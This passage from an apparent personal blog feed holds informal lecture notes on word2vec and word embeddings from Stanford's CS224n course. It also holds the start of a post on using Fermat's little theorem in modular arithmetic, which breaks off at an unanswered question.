<li><a href="http://www.aclweb.org/anthology/Q15-1016">Improving
Distributional Similarity with Lessons Learned from Word
Embeddings</a></li>
<li><a href="http://www.aclweb.org/anthology/D15-1036">Evaluation
methods for unsupervised word embeddings</a></li>
</ol>
<h3 id="additional-readings">Additional Readings</h3>
<ol type="1">
<li><a href="http://aclweb.org/anthology/Q16-1028">A Latent Variable
Model Approach to PMI-based Word Embeddings</a></li>
<li><a href="https://transacl.org/ojs/index.php/tacl/article/viewFile/1346/320">Linear
Algebraic Structure of Word Senses, with Applications to
Polysemy</a></li>
<li><a href="https://papers.nips.cc/paper/7368-on-the-dimensionality-of-word-embedding.pdf">On
the Dimensionality of Word Embedding</a></li>
</ol>NLP Word2Vec Algorithm2022-03-20T00:00:00-07:002022-03-20T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-03-20:/posts/nlp-word2vec-algorithm.htmlA post detailing more about the Word2Vec algorithm, its variations and utilities<p>This blog post captures the inner workings of the Word2Vec Algorithm,
by roughly following the lecture patterns for the Cs224n course from
Stanford.</p>
<h3 id="word2vec-algorithm">Word2vec algorithm</h3>
<p>Recalling the <em>Word2vec</em> algorithm from <a href="Introduction-to-nlp-and-word-vectors">Introduction-to-nlp-and-word-vectors</a>,
the only parameters of this model are the word vectors. We have context
word vectors and center word vectors for each word and then taking their
dot product to get a probability, which gives a score of how likely a
particular context word is to occur with the center word. Using the
softmax transformation on the dot product converts the scores into
probabilities. word2vec model is called a bag of words (BoW) model. BoW
models does not pay any attention to word order or position, the
distance of the context words from the center word while computing the
probability estimate.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/word2vec_bow.png"/></p>
<h4 id="optimization-gradient-descent">Optimization: Gradient
Descent</h4>
<p>The next step would be to determine the gradient of the loss function
with respect to the parameters. The algorithm starts with random word
vectors. They are initialized with small numbers, near 0 in each
dimension. The loss function J uses a gradient descent algorithm, an
iterative algorithm, that learns to maximize <span class="math inline"><em>J</em>(<em>θ</em>)</span> by changing theta,
which represents the model weights. The idea of the algorithm is to
calculate the gradient <span class="math inline"><em>J</em>(<em>θ</em>)</span>, from the current
values of <span class="math inline"><em>θ</em></span>, by making a small
step in the direction of the negative gradient to gradually move down
towards the minimum.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/gradient_descent.png"/></p>
<p>The simple gradient descent works the following way: The <strong>step
size</strong> parameter of the algorithm determine the time taken and if
the function converges. If the <strong>step size</strong> is too smal,
it would take a long time to minimize the function while a large step
can make the function diverge and keep getting bouncing back and forth.
The algorithm steps a little bit in the negative direction of the
gradient using the step size, which gives new parameter values. But ach
individual parameter gets updated only a little bit by working out the
partial derivative of J with respect to that parameter and by using the
learning rate, where J is a function of all windows in the corpus.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/update_step.png"/></p>
<p>Note that the denominator is a sum over every center word in the
entire corpus, but they often have billions of words in the corpus,
which makes computing the gradient of <span class="math inline"><em>J</em>(<em>θ</em>)</span> expensive, as we have
to iterate over the entire corpus. So a single gradient update takes a
long time and optimization would be extremely slow.</p>
<h4 id="stochastic-gradient-descent">Stochastic Gradient Descent</h4>
<p>The alternative to avoid the above issue is to use stochastic
gradient descent. So rather than working out an estimate of the gradient
based on the entire corpus, we take one center word or a small batch of
32 center words, work out an estimate of the gradient based on them. Now
that estimate of the gradient will be noisy and bad because only a small
fraction of the corpus was used rather than the whole corpus. But
nevertheless, we can use that estimate of the gradient to update the
theta parameters in exactly the same way. So with a billion word corpus,
with each center word, we can make a billion updates to the parameters
as we pass through the corpus once rather than only making one more
accurate update to the parameters using the entire corpus. So overall,
we can learn several orders of magnitude more quickly.</p>
<p>Neural nets have some quite counter intuitive properties and even
though the stochastic gradient descent is noisy and bounces around, the
complex networks learns better solutions than when using a plain and
slow gradient descent.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/stochastic_grad_descent.png"/></p>
<h4 id="note-about-sgd">Note about SGD</h4>
<p>For example, when performing stochastic gradient update for one
window, with one center word and window size of 5, there would be at
most 11 distinct word types. So gradient information will be available
for those 11 words but the other 100,000 words in our vocabulary will
have no gradient update information, making it a very sparse gradient
update. Thinking from a systems optimization perspective, we would
ideally want to update the parameters only for a few words and there are
many efficient ways to achieve that.</p>
<blockquote>
<p>Note: word vectors have been presented as column vectors, which is
usually how mathematical notation prescribes, however in deep learning
packages, word vectors are actually represented as row vectors</p>
</blockquote>
<p><img src="/extras/images/nlp-word2vec-algorithm/stochastic_grad_wordvec.png"/></p>
<h4 id="why-two-different-vectors-for-the-same-word">Why two different
vectors for the same word</h4>
<p>If we use the same vector for context and center, and if the same
word occurs in the same window as both a center and a context word, then
a dot product of the same term with itself, makes it messier to work
out.</p>
<h3 id="word2vec-model-functions">Word2Vec model functions</h3>
<p>word2vec can operate in two different models 1. skip-gram model -
where it predicts the context words given the center word in a bag of
words style model. 2. Continuous Bag of Words model - where it predicts
the center word from a bag of context words.</p>
<p>The original word2vec paper used the skip-gram model and used
negative sampling also called SGNs (skip-grams negative sampling),
instead of the naive softmax. This was due to the expensive cost of
computing the denominator you have to iterate over every word in the
vocabulary and work out these dot products for every word in the corpus
for each window. While negative sampling trains binary logistic
regression models for both the true pair of center word and the context
word versus noise pairs where the true center word and randomly sample
words from the vocabulary are paired, and updates only the related
weights, instead of updating all of the weights.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/skip_gram_negative_sampling.png"/></p>
<p>Instead of softmax, the dot product is passed through the logistic
function (sigmoid), which maps any real number to a probability between
0 and 1 open interval. So for a large dot product. the logistic function
would return 1.</p>
<p>On average the dot product between the center word and context words,
should be small if they most likely didn’t actually occur in the
context. This is achieved using the sigmoid function, which is symmetric
and to make probability small, we can take the negative of the dot
product i.e., The dot product of a random context word and the center
word would be a small number, which is again negated to put through the
sigmoid.</p>
<p>The objective is to actually maximize the <span class="math inline"><em>J</em><sub><em>t</em></sub>(<em>θ</em>)</span>.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/skip_gram_negative_sampling_2.png"/></p>
<p>Comparing this to the earlier discussion of minimizing the negative
log likelihood, where we use the negative log likelihood of the sigmoid
of the dot product and use k-negative samples of random words. This loss
function would be minimized given this negation of the log of the dot
product ,by making these dot products large, and the small k-negative
dot products are negated which would be small postive after going
through the sigmoid.</p>
<h5 id="better-sampling-of-rare-words">Better sampling of rare
words</h5>
<p>While sampling, the authors of the word2vec sample the words based on
their probability of occurrence using the unigram distribution of words,
which defines how often words actually occur in the corpus. For example,
in a billion word corpus, a particular word occurred 90 times in it, the
90 divided by a billion, is the unigram probability of the word. It is
also <span class="math inline">(3/4)<sup><em>t</em></sup><em>h</em></span> powered,
which renormalizes the probability distribution and dampens the
difference between common and rare words to ensure that less frequent
words are sampled more often, but still not nearly as much as if a
uniform distribution was utilized.</p>
<h4 id="problems-with-co-occurence-matrix">Problems with co-occurence
matrix</h4>
<p><img src="/extras/images/nlp-word2vec-algorithm/cooccurence-matrix.png"/></p>
<ol type="1">
<li>Cooccurence matrices are huge very sparse For example with
vocabulary of half a million words, we have half a million dimensional
vector.</li>
<li>Results tend to be noisier and less robust depending on what words
are available in the corpus.</li>
<li>So for better results we should work with low dimensional
vectors.</li>
<li>In practice the dimensionality of the vectors that are used are
normally somewhere between 25 and 1,000.</li>
</ol>
<h4 id="singular-value-decomposition">Singular Value Decomposition</h4>
<p><img src="/extras/images/nlp-word2vec-algorithm/singular-value-decomposition.png"/></p>
<p>Singular value projection gives an optimal way under a certain
definition of optimality, of producing a reduced dimensionality pair of
matrices that maximally recovers the original matrix. So the cooccurence
count matrix can be decomposed into three matrices - a diagonal matrix
U, sigma, and a V transpose matrix. We can take advantage of the fact
that the singular values inside the diagonal sigma matrix are ordered
from largest down to smallest and discounting some of the smaller
values, we can extract lower dimensional representations for our words
which enables us to recover the original co-occurrence matrix. But it
works poorly because we are expecting to have these normally distributed
errors because we have exceedingly common words like “a,” “the,” and
“and” and a very large number of rare words.</p>
<p>We can use the log of the raw counts or cap the maximum count or
remove the function words to address this issue and such methods were
explored heavily in the 2000s.</p>
<h4 id="coals">COALS</h4>
<p><img src="/extras/images/nlp-word2vec-algorithm/coals-hacks.png"/></p>
<p>Doug Rohde explored a number of these ideas as to how to improve the
co-occurrence matrix in a model that he built that was called COALS. We
get the same kind of linear semantic components, which can be used to
identify analogies.</p>
<p><img src="/extras/images/nlp-word2vec-algorithm/coals-analogies.png"/></p>
<p>These vector components are not perfect, but are roughly parallel and
roughly the same size. And so we have a meaning component there that we
could add on to another word for analogies. We could determine drive is
to driver as marry is to a priest. This acted as the basis for the Glove
model investigation.</p>
<h4 id="word2vec-implementation-code">Word2Vec Implementation Code</h4>
<h4 id="references">References</h4>
<ol type="1">
<li><a href="https://www.youtube.com/watch?v=gqaHkPEZAew">Video</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/slides/cs224n-2022-lecture02-wordvecs2.pdf">Slides</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/readings/cs224n-2019-notes02-wordvecs2.pdf">Notes</a></li>
</ol>Introduction to NLP and Word Vectors2022-03-16T00:00:00-07:002022-03-16T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-03-16:/posts/introduction-to-nlp-and-word-vectors.htmlA post about Introduction to NLP and basics of Word Vectors<p>This blog post and the following series captures the path of
understanding NLP, usage of Deep Learning in NLP and the various
algorithms, by roughly following the lecture patterns for the Cs224n
course from Stanford.</p>
<h3 id="lecture-1-introduction-and-word-vectors">Lecture 1 –
Introduction and Word Vectors</h3>
<p>The following post is primarily about driving home the fact that a
word’s meaning can be represented, not perfectly but really rather well
by a large vector of real numbers. This has been an amazing find which
has taken research away from the traditional approaches followed before
deep learning.</p>
<h4 id="intent">Intent</h4>
<ol type="1">
<li>foundation - good deep understanding of the effect of modern methods
for deep learning applied to NLP.</li>
<li>basics & key methods that are used in NLP, recurrent networks,
attention transformers</li>
<li>Ability to build systems in PyTorch</li>
<li>Learning word meanings, dependency parsing, machine translation,
question answering.</li>
</ol>
<p><img alt="Source: xkcd: I Could Care Less" src="https://imgs.xkcd.com/comics/i_could_care_less.png" title="Source: xkcd: I Could Care Less" width="408"/></p>
<h4 id="language-model">Language model</h4>
<ol type="1">
<li><p>Building computational systems that try to get better at guessing
how their words will affect other people and what other people are
meaning by the words that they choose to say.</p></li>
<li><p>It is a system that was constructed by human beings relatively
recently in some sense.</p></li>
</ol>
<h4 id="how-do-word-vectors-work">How do word vectors work</h4>
<p>Language arose for human beings sort of somewhere in the range of
100,000 to a million years ago. But that powerful communication between
human beings quickly set off our ascendancy over other creatures. It was
much more recently again that humans developed writing, which allowed
knowledge to be communicated across distances of time and space. So a
key question for artificial intelligence and human-computer interaction
is how to get computers to be able to understand the information
conveyed in human languages.</p>
<p>We need knowledge to understand language and people well, but it’s
also the case that a lot of that knowledge is contained in language
spread out across the books and web pages of the world.</p>
<p>So with recent advancements, machine translation works moderately
well. Learning other people’s languages was a human task which required
a lot of effort and concentration. But now to get news from Kenya we can
use Google to translate Swahili from a Kenyan website.</p>
<p><img alt="slide-google-translate" src="/extras/images/introduction-to-nlp-and-word-vectors/2022-03-18-11-07-20-image.png" title="" width="748"/></p>
<h4 id="gpt-3">GPT-3</h4>
<p>One of the recent and biggest development in NLP, including the
popular media was GPT-3, which was a huge new model that was released by
OpenAI. Its exciting as it has started to look the first step on the
path to universal models, where we can train an extremely large model on
the world knowledge of human languages, of how to do tasks. So we are no
longer building a model to detect spam, to detect foreign language
content, rather just building all these separate supervised classifiers
for every different task, since we have a model that understands.</p>
<p>It is really good at predicting words. The two examples are explained
below.</p>
<ol type="1">
<li><p>Write about Elon Musk in the style of Doctor Seuss</p></li>
<li><p>Question prediction from a sentence using couple of examples. The
model started predicting the questions after just two examples.</p></li>
</ol>
<p>The way it generates more text is by just predicting one word at a
time, following words to complete its text.</p>
<p><strong>Another Example:</strong> Translating human language
sentences into SQL.</p>
<p><img alt="gpt-example" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-13-56-image.png" title="gpt-example" width="762"/></p>
<h4 id="what-is-language-and-its-meaning">What is language and its
meaning?`</h4>
<p>How do we represent the meaning of a word? - Webster’s dictionary
definition is really focused on the “word idea”, which is pretty close
to the most common way that linguists think about meaning. However,
<strong>denotational semantics</strong> captures word meaning as being a
pairing between a word which is a signifier or symbol, and the thing
that it signifies, the signified thing which is an idea or thing.</p>
<p>So the meaning of the word chair is the set of things that are
chairs. A term that’s also used and similarly applied for the semantics
of programming languages. So traditionally the way that meaning has
normally been handled in natural language processing systems is to make
use of resources like dictionary, and thesaurus in particular. For
example, <strong>WordNet</strong>, which organized words and terms into
both synonyms sets of words that can mean the same thing, and hypernyms
which correspond to IS-A relationships.</p>
<h5 id="problem-with-wordnet">Problem with WordNet</h5>
<p>In WordNet, “proficient”” is listed as a synonym for “good”, which is
accurate only in some contexts. it is limited as a human constructed
thesaurus. Its difficult to keep it up to date, including more current
terminology. For example, “wicked”” is there for the wicked witch, but
not for more modern colloquial uses. “Ninja” is another example where
WordNet is not kept up to date. So it requires a lot of human labor, but
even then, it has a set of synonyms but does not really have a good
sense of words that means something similar. So this idea of meaning
similarity is something that would be really useful to make progress on,
and where deep learning models excel.</p>
<h5 id="problem-with-traditional-nlp">Problem with traditional NLP</h5>
<p>Problem with traditional NLP is that words are regarded as discrete
symbols. Symbols like hotel, conference, motel are words, which in deep
learning are referred as a localized representation. Because in a
statistical machine learning systems, these symbols need to be
represented in a statistical model to build a logistic regression model
with words as features, typically like an one-hot encoded vector.</p>
<h4 id="one-hot-encoding-vector">One hot encoding vector</h4>
<p>One hot encoding vector has a dimension for each different word. So
that means that we need huge vectors corresponding to the number of
words in our vocabulary. For a high school English dictionary it
probably have about 250,000 words in it and probably need a 500,000
dimensional vector to be able to cope with that. But the bigger with
discrete symbols is that there is no notion of word relationships and
similarity. So for example, if a user searches for Seattle motel, it
should match on documents containing Seattle “hotel” as well. So in a
mathematical sense, these two vectors are orthogonal, that there’s no
natural notion of similarity between them.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-27-00-image.png"/></p>
<h4 id="word-embeddings">Word Embeddings</h4>
<blockquote>
<p>you shall know a word by the company it keeps. - J. R Firth</p>
</blockquote>
<p>Modern deep learning method allows encoding similarity in real value
vector themselves. <strong>distributional semantics</strong> - where
word’s meaning is going to be given by the words that frequently appear
close to it. This represent a sense for words, <strong>meaning as a
notion of what context that appears in</strong> has been a very
successful idea. It proves to be an extremely computational sense of
semantics, which has just led to it being used everywhere very
successfully in deep learning systems. So when a word appears in a text,
it has a context which are a set of words that appear along with it.</p>
<h5 id="example---banking">Example - “banking”</h5>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-38-34-image.png"/></p>
<p>The word “banking”” occurs in text, and the nearby words (context
words) in some sense represent the meaning of the word banking. Based on
looking at the words that occur in context as vectors, we want to build
dense real valued vector for each word, that in some sense represents
the meaning of that word. The way it will represent the meaning of that
word, is when this vector would be useful for predicting other words
that occur in the context.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-42-28-image.png"/></p>
<p>A simple 8-dimensional illustration (<em>in reality, usually 300
dimensional vectors are used</em>), of the neural word representations
or “word embeddings”, represents the distributed representation, not a
localized representation because the meaning of the word banking is
spread over all 300 dimensions of the vector. These are called word
embeddings because, in a group of words, these representations place
them in a high dimensional vector space, and so they’re embedded into
that space.</p>
<h4 id="introduction-to-word2vec">Introduction to word2vec</h4>
<p>Word2Vec was introduced by <strong>Tomas Mikolov and
colleagues</strong> in 2013 as a framework for learning word vectors, It
uses a lot of text, commonly refer to as a corpus (originated from the
Latin word for body), meaning a body of text., with. a vocabulary size
of 400,000 and then create vectors for every word. To determine the best
vector for each word, we can learn these word vectors from just a big
pile of text by doing this distributional similarity task of being able
to predict, what words occur in the context of other words. So
specifically, going through the texts, and using a center word C, and
context words O, calculate the probability of a context word occurring,
given the center word according to our current model. Since the corpus
is available, it is known that certain words actually occur in the
context of that center word, we can keep adjusting the word vectors to
maximize the probability that’s assigned to words that actually occur in
the context of the center word as we proceed through these texts.</p>
<p><img alt="word-vector-window" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-54-10-image.png" title="" width="369"/>.
<img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-11-55-03-image.png"/></p>
<h4 id="determining-the-probability-of-a-word-occurring-in-the-context-of-a-given-center-word">Determining
the probability of a word occurring in the context of a given center
word</h4>
<p>For each position in the corpus, we want to predict context words
within a window of fixed size, given the center word W<sub>j</sub></p>
<p>Ideally we need to give high probability to words that actually occur
in the context. i.e., identify the likelihood of predicting words in the
context of other words correctly and this likelihood will be defined in
terms of the word vectors. These form the parameters of our model, and
it will the product of using each word as the center word, and each
other context word in the window to determine the probability of
predicting that context word in the center word. And to learn this
model, there would be an objective function, also called a cost or a
loss that we want to optimize. And essentially <strong>maximize the
likelihood of the context we see around center words.</strong></p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-12-00-56-image.png"/></p>
<p>Following changes are made to the objective function:</p>
<ol type="1">
<li><p>Use log likelihood to convert all the products into
sums.</p></li>
<li><p>Also use average log likelihood, denoted by <em>1/T</em></p></li>
<li><p>Minimize our objective function, <span class="math inline"><em>J</em>(<em>θ</em>)</span> becomes maximizing our
predictive accuracy.</p></li>
</ol>
<blockquote>
<p>Note: Each word will have two word vectors - One word vector for when
it’s used as the center word, and a different word vector when that’s
used as a context word. This is done to simplify the math and the
optimization and makes building word vectors a lot easier,</p>
</blockquote>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-12-07-40-image.png"/></p>
<h4 id="likelihood-probability-calculation">Likelihood Probability
Calculation</h4>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-12-09-03-image.png"/></p>
<p>For a particular center word v<sub>c</sub> and a particular context
word u<sub>o</sub>, look up the vector representation of each word, and
take the dot product of those two vectors.</p>
<blockquote>
<p>Dot product is a natural measure for similarity between words because
it generates a component that adds to that dot product sum. If both are
negative, it’ll add a lot to the dot product sum. If one’s positive and
one’s negative,it’ll subtract from the similarity measure. Both of them
are zero, won’t change the similarity.</p>
</blockquote>
<p><strong>if two words have a larger dot product, that means they’re
more similar.</strong></p>
<h4 id="softmax-function">Softmax function</h4>
<p>The next step is to convert this how to turn this into a probability
distribution and to avoid negative probabilities exponentiate them and
normalize by dividing by the sum of the numerator quantity for each
different word in the vocabulary. This ensures that the distribution is
between 0 and 1. This formulates the softmax function which will take
any R in vector and turn it into values between 0 to 1.</p>
<ol type="1">
<li><p>“max” term - accentuates and emphasizes the big contents in the
different dimensions of calculating similarity, as it exponentiates the
probabilities.</p></li>
<li><p>“soft” term - gives a probability distribution of the next
possible words.</p></li>
</ol>
<blockquote>
<p>max function returns just one the biggest term, whereas softmax takes
a set of numbers, scales them, and returns a probability
distribution.</p>
</blockquote>
<h4 id="construct-word-vectors">Construct word vectors</h4>
<p>The plan is to optimize the word vectors to minimize the loss
function, i.e. maximize the probability of the words that were actually
in the context of the center word. <span class="math inline"><em>θ</em></span> represents all of the model
parameters in one very long vector. So for the model, word vectors are
the only parameters. So for each word there are two vectors, context
vector and center vector. And each of those is a D dimensional vector,
where D might be 300 and we have V many words in the vocabulary. So the
model is of size <span class="math inline">2 * <em>D</em> * <em>V</em></span> . So for a
vocabulary of size 500k and with a 300 dimensionality vector, there
would be millions of millions of parameters, to train and maximize the
prediction of context words.</p>
<h4 id="multivariate-calculus">Multivariate Calculus</h4>
<p>Derivatives can be computed using multivariate calculus and the
gradients can be determined by walking downhill to minimize loss, using
stochastic gradient descent. We have <span class="math inline"><em>J</em>(<em>θ</em>)</span> that is needed to
minimize the average negative log likelihood. And then we iterate
through the words in each context, to compute <span class="math inline"><em>J</em>(<em>θ</em>)</span> between M words on
both sides except with itself. Then determine the log probability of the
context word at that position, given the word that’s in the center
position <span class="math inline"><em>t</em></span>.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-11-37-image.png"/></p>
<p>Probability <span class="math inline"><em>P</em>(<em>o</em>|<em>c</em>)</span> can be
determined as the softmax of the dot product of <span class="math inline"><em>u</em><sub>0</sub> * <em>V</em><sub><em>c</em></sub></span>
normalized by the sum of all probabilities of the word distribution. To
compute the gradient, the partial derivative of this expression with
respect to every parameter in the model is computed, and all the
parameters in the model are the components depending on the dimensions
of the word vectors of every word.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-19-25-image.png"/></p>
<p>Walking through these in steps, the partial derivative with respect
to the center word vector(<em>a 300 dimensional word vector</em>) is
calculated. Considering the expression as A/B, using log turns it into
log A minus log B. Then the partial derivative of <span class="math inline"><em>V</em><sub><em>c</em></sub></span> is simply
<span class="math inline"><em>u</em><sub>0</sub></span></p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-31-59-image.png"/></p>
<p>Now using the chain rule the denominator can be computed. This part
is essentially going from outside to inside in terms of derivatives. The
above image is more cleaner explanation.</p>
<p>Combining all the expressions together, rewriting the expression, by
moving the sum <code>w = 1 to v</code> inside the summation expression
we end up getting exactly the softmax formula probability that we saw
when we started. So the expression more conveniently becomes <span class="math inline"><em>U</em><sub>0</sub></span> minus the sum over
<code>X = 1 to V</code> of the probability of X given C times <span class="math inline"><em>U</em><sub><em>x</em></sub></span>.</p>
<p>And so what we have at that moment is this thing here is an
<strong>expectation.</strong></p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-34-13-image.png"/></p>
<p>This is not an average over all the context vectors weighted by their
probability according to the model.it’s always the case with these
softmax style models, we get the observed minus the expected for the
derivatives. So the model is good if on average it predicts exactly the
word vector that we actually see.</p>
<p>The next step is to try and adjust the parameters of our model to try
and make the probability estimates as high as we possibly can using
stochastic gradient.</p>
<h4 id="gensim">Gensim</h4>
<p>GENESIM is a package often used for word vectors, it’s not really
used for deep learning and for testing glove word vectors were used by
loading a hundred dimensional word vectors.</p>
<p><img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-46-10-image.png"/></p>
<p>Checking the first 10 dimensions of the word vectors for
<em>bread</em> and <em>croissant</em>, these two words are a bit
similar, so both of them are negative in the first dimension, positive
in the second, negative in the third, positive in the fourth, negative
in the fifth and so on. So they might have a fair bit of dot product
which is kind of what we want because bread and croissant are kind of
similar. Few more examples,</p>
<ol type="1">
<li><p>Similar to banana</p></li>
<li><p>Similar to brioche</p></li>
<li><p>Similar to USA</p></li>
</ol>
<p><img alt="most-similar-banana" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-47-48-image.png" title="most-similar-banana" width="282"/>.
<img src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-48-24-image.png">
<img alt="most-similar-usa" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-49-08-image.png" title="" width="297"/></img></p>
<h4 id="analogy-task">Analogy task</h4>
<p>The idea of the analogy task defines that we start with a word like
<strong><em>king</em></strong>, and should be able to subtract out a
male component from that, add back in a woman component, and then we
should be able to ask for the appropriate word, which should be the word
<strong><em>queen</em></strong>.</p>
<p>Few other examples are illustrated below using Gensim</p>
<p><img alt="analogy-example" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-50-13-image.png" title="" width="393"/>.
<img alt="analogy-example" src="/extras/images/lecture-01-introduction-word-vectors/2022-03-18-14-53-34-image.png" title="" width="400"/></p>
<p>Even linguistic analogies, such as the analogy of tall is to tallest
as long is to longest.</p>
<h4 id="why-two-different-vectors">Why two different vectors</h4>
<p>Recall the equation for <span class="math inline"><em>J</em>(<em>θ</em>)</span> taking a sum over
every word which is appearing as the center word, and then inside that
there’s a second sum which is for each word in the context, where we
count each word as a context word, and then for one particular term of
that objective function you’ve got a particular context word and a
particular center word that you’re then sort of summing over different
context words for each center word, and then you’re summing over all of
the decisions of different center words. In case the window contains the
same word as the center and context word, it messes with the
derivatives. while taking them as separate vectors ensures that this
issue does not occur. The two vectors would be very similar, but not
identical due to technical reasons such as occurring at the ends of
documents and other similar differences.</p>
<p>The usual method (followed for word2vec algorithm) is to average
those two vectors and consider the average vector as the representation
of the word.</p>
<h4 id="question-how-about-words-with-multiple-meanings-homonyms-and-common-words">Question:
How about words with multiple meanings (Homonyms) and common words</h4>
<ol type="1">
<li><p>For a word like <strong>star</strong>, that can be astronomical
object or it can be a movie star,. Taking all those uses of the word
star and collapsing them together into one word vector. actually turns
out to work rather well.</p></li>
<li><p>For very common words that are commonly referred to as
<strong>function words</strong> by linguists, which includes words like
<em>so</em> and <em>not</em>, prepositions, words such as <em>to</em>,
<em>on</em> etc., the suspicion is that the word vectors would not work
very well because they occur in all kinds of different contexts. However
large language models do a great job in those words as well</p></li>
</ol>
<h4 id="conclusion">Conclusion</h4>
<p>Another feature of the word2vec model is that it actually ignores the
position of words, ie., it will predict every word around the center
word before or after, one or two positions away in either direction
using the one probability function. But this sort of destroys the
ability at capturing the subtleties more common grammatical words which
occur or do not occur at the end of a sentence. But we can build
slightly different models that are more sensitive to the structure of
sentences, which can then perform better on these errors. So word2vec is
more of a framework for building word vectors, and there are several
variant precise algorithms within the framework. One such variant is the
prediction of either the context words (skip grand model) or the center
word.</p>
<p>So to learn word vectors we start off by having a vector for each
word type both for context and outside and those vectors we initialize
randomly, so that we just place small little numbers that are randomly
generated in each vector component. And that’s just the starting point,
And from there on we are using an iterative algorithm where we are
progressively updating those word vectors, so they do a better job at
predicting which words appear in the context of other words. And the way
that we are going to do that is by using the gradients and once we have
a gradient, we can walk in the opposite direction of the gradient and we
are then walking downhill, i.e. we are minimizing your loss and repeat
until our word vectors get as good as possible.</p>
<h4 id="suggested-reading">Suggested reading</h4>
<ol type="1">
<li><a href="http://arxiv.org/pdf/1301.3781.pdf">Efficient Estimation of
Word Representations in Vector Space</a> (original word2vec paper)</li>
<li><a href="http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf">Distributed
Representations of Words and Phrases and their Compositionality</a>
(negative sampling paper)</li>
</ol>
<h4 id="references">References</h4>
<ol type="1">
<li><a href="https://www.youtube.com/watch?v=8rXD5-xhemo">Video</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/slides/cs224n-2022-lecture01-wordvecs1.pdf">Slides</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/readings/cs224n-2019-notes01-wordvecs1.pdf">Notes</a></li>
</ol>Using Fermat’s little theorum for modular arithmetic2022-01-19T00:00:00-08:002022-01-19T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2022-01-19:/posts/using-fermats-little-theorum-for-modular-arithmetic.htmlThis post discusses Fermat’s little theorum and its usage in modular arithmetic<p>Fermat’s little theorum is a fundamental theorum for any modular
arithmetic problems and provides a neat little trick for finding the
reminder for division by large numbers.</p>
<h4 id="from-wikipedia">From Wikipedia</h4>
<p><a href="https://en.wikipedia.org/wiki/Fermat%27s_little_theorem">Fermat’s
little theorem</a> states that if p is a prime number, then for any
integer a, the number <span class="math inline"><em>a</em><sup><em>p</em></sup> − <em>a</em></span>
is an integer multiple of p. In the notation of modular arithmetic, this
is expressed as</p>
<p><span class="math display"><em>a</em><sup><em>p</em></sup> ≡ <em>a</em> (mod <em>p</em>).</span></p>
<ol type="1">
<li>Using the Fermat’s little theorum for modular arithmetic, we know
that <span class="math inline"><em>a</em><sup><em>p</em></sup> ≡ <em>a</em>(<em>m</em><em>o</em><em>d</em><em>p</em>)</span></li>
<li>Dividing by a on both sides, <span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup> ≡ 1 (mod <em>p</em>)</span>
for all <span class="math inline">1 ≤ <em>a</em> ≤ <em>p</em> − 1</span></li>
<li><span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span></li>
<li><span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup><em>k</em> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span> and
k is a natural number.</li>
</ol>
<h4 id="test-for-primality">Test for primality</h4>
<p>r is a prime number iff <span class="math inline"><em>a</em><sup>(<em>r</em>−1)</sup> ≡ 1 (mod <em>r</em>)</span>
for <span class="math inline">1 ≤ <em>a</em> ≤ <em>r</em> − 1</span></p>
<h4 id="question-what-is-222006-pmod-3">Question: What is <span class="math inline">2<sup>2<sup>2006</sup></sup> (mod 3)</span></h4>
<p>From Fermat’s little theorum we know that <span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span></p>
<blockquote>
<p>The trick here is to make the power same as <span class="math inline">(<em>p</em>−1)</span></p>
</blockquote>
<p>So we can formulate that,</p>
<p><span class="math inline">2<sup>(3−1)</sup> ≡ 1 (mod 3)</span> which
becomes <span class="math inline">2<sup>2</sup> ≡ 1 (mod 3)</span></p>
<p>which means</p>
<p><span class="math inline">2<sup>(2<sup>2006</sup>)</sup> ≡ 1 (mod 3)</span>
i.e., <span class="math inline">(2<sup>2</sup>)<sup>2<sup>2005</sup></sup> ≡ 1<sup>(2<sup>2005</sup>)</sup> (mod 3)</span></p>
<p>So, the solution is <span class="math inline">2<sup>2<sup>2006</sup></sup> (mod 3) ≡ 1 (mod 3)</span></p>
<h4 id="question-is-the-difference-between-530000-and-6123456-divisible-by-31">Question:
Is the difference between <span class="math inline">5<sup>30000</sup></span> and <span class="math inline">6<sup>123456</sup></span> divisible by 31</h4>
